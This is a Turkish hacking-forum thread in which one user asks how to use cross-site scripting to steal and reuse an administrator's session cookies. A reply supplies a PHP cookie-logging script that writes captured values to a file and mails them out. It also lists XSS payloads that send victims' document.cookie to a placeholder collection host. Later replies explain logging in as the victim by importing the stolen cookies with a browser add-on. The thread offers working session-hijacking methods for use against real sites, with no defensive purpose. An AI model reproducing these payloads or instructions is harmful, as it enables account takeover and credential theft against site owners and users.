Xss Yardım :S

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek

    merhaba arkadaşlar

    dökümanları felan okudum. javascriptte basit işlemler yaptırabilcek kadar bilgim zaten var. denediğim 1-2 sitede " çalıştır. yani sayfada uyarı verdirebildim. cookie de alabildim ama aldığım cookileri kaydettiğim zaman kendi hesabımla giriyorum. bi de location komutunu deniyorum. arama gerçekleşince sayfa yönlenio ama sayfada kalıcı yönlenme söz konusu değil :S bi yerde takılıyorum elbet ama nerde :S şimdiden teşekkürler...


    screw you guys! i"m goin" hoooome!
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek
    Sayfada uyarı verebiliyorumdan kastın alert çıkartıyorsun sanırım. Cookileri nereye kaydediyorsun ? Kendi cookilerini silip aldığın cookilerimi kaydediyorsun ? Firefox'dan mı?
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek
    firefox cookie editorle de yaptım, üzerine yazdırma yoluyla. ie de normal txt içinede yazdırdım. bu arada uyarıdan kastım evet alert. dier bi sorunum ise; yönlendirme kodu sayfada
    çalışıo, kalıcı olması için ne yapmam lazım. :)

    screw you guys! i"m goin" hoooome!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek

    <?php
    $kayit = fopen("dosya.txt","a");
    foreach($_GET as $variable => $value) {
    fwrite($kayit,$variable . ": " . $value . "\n");
    }
    fwrite($kayit,"---------------------------\n");
    fclose($kayit);
    mail("mailadresin@mail.com","password","",’From: color=#0000ffxxxx@mail.com’);
    ?>

    chmod 777

    Örnek :

    :2082/login?user=**<SCRIPT>location.href= ". cookie)</script>

    /users.php?f=1&s=1’<script>document.location=’http: //www.siten.com/xss/?’+escape(document.cookie)</script>&w=asc&d=50

    comments.php?id=1"<script>document.location=’http: //www.siten.com/xss/?’+escape(document.cookie)</script>

    /modules.php?f=1&s=1’<XML src= "">
    :2082/login?user=**<SCRIPT>location.href= ". cookie)</script>

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek
    cookie yi mail adresime almadan da okuyabiliyorum. ama kullanamıyorum :S bu arada 2.soru da hala şaşkın durumdaım :D

    screw you guys! i"m goin" hoooome!
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek
    Hoja uzaktan kod çalıştırabilmen için kodu klasördeki dosyalardan birine entegre etmen gerekiyor. URL'ye kodu yazarak sayfayı istediğin şekilde (kalıcı) yönlendiremessin.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek
    hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S

    screw you guys! i"m goin" hoooome!
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek
    f1kr3t bunu yazdı:
    -----------------------------
    hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
    -----------------------------
    Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikret
    Fikret's avatar
    Kayıt Tarihi: 01/Ekim/2007
    Erkek

    Swool bunu yazdı:
    -----------------------------
    f1kr3t bunu yazdı:
    -----------------------------
    hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
    -----------------------------
    Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin.
    -----------------------------

    o eklentiyle çerezleri zaten değiştiriyorum ama çalışmıyo işte :S yani anlamak istediğim, çerezi gördüğümüz zaman onu kullanarak yönetici girişi yapabilmemiz mümkün mü ? eğer öleyse bi yardımcı olun lütfen :D çöziim şu olayı :D 


    screw you guys! i"m goin" hoooome!
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Swool
    Swool's avatar
    Kayıt Tarihi: 11/Kasım/2007
    Erkek
    f1kr3t bunu yazdı:
    -----------------------------

    Swool bunu yazdı:
    -----------------------------
    f1kr3t bunu yazdı:
    -----------------------------
    hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
    -----------------------------
    Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin.
    -----------------------------

    o eklentiyle çerezleri zaten değiştiriyorum ama çalışmıyo işte :S yani anlamak istediğim, çerezi gördüğümüz zaman onu kullanarak yönetici girişi yapabilmemiz mümkün mü ? eğer öleyse bi yardımcı olun lütfen :D çöziim şu olayı :D 


    -----------------------------
    Bazı scriptlerde güvenlik duvarı söz konusu olabiliyor. Normal koşullarda eğer cookiler yöneticiye aitse girişi o kullanıcı adıyla yapabilirsin.
Toplam Hit: 2139 Toplam Mesaj: 10